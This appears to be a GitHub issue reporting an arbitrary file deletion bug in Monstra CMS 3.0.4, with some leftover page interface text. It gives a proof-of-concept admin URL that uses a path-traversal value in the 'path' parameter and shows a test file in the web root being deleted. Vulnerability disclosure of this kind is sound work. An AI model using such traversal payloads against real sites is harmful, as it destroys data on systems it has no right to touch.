any file delete

Vulnerable URL：http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

touch 1.txt in /var/www/html/monstra-3.0.4/

visit  url：http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

the 1.txt will delete

<img width="1271" alt="image" src="https://user-images.githubusercontent.com/22784289/44795732-02a11280-abde-11e8-97ac-8d6e65e8f5a6.png">



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

any file delete #456

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

any file delete #456

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions